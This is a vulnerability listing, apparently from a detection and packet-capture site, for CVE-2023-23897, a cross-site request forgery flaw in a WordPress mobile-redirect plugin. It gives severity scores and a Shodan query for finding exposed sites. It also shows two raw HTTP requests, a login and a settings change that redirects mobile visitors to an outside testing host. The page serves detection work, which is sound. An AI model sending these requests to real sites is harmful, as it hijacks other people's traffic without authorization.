🔙 목록으로 돌아가기

CVE-2023-23897: Ozette Plugins - Cross-Site Request Forgery

TitleOzette Plugins - Cross-Site Request Forgery
Authorpopcorn94
SeverityMedium
ImpactAttackers can perform unauthorized actions on behalf of authenticated users, potentially leading to data manipulation or unauthorized redirects.
RemediationUpdate to version 1.7.3 or later with CSRF protections implemented.
CVSS Score4.3
EPSS Score0.40065
CVE IDCVE-2023-23897
CWE IDCWE-352
Shodan Queryhtml:"simple-mobile-url-redirect"
Tags cve cve2023 wordpress wp plugins ozette csrf vuln authenticated vkev simple-mobile-url-redirect

🔍 Vulnerability Description

An attacker can update, create, and remove the site’s mobile redirects via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

🌐 HTTP Request

POST /wp-login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

log=0QOtTM&pwd=FFvufn&wp-submit=Log+In
POST /wp-admin/options-general.php?page=simple-mobile-url-redirect-1.7%2Fmobile-redirect.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
Connection: close
Content-Length: 92
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

mobiletoggle=&mobileurl=oast.pro&mobilemode=301&mobileredirectoncedays=7&submit=Save+Changes

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-23897.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-23897.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A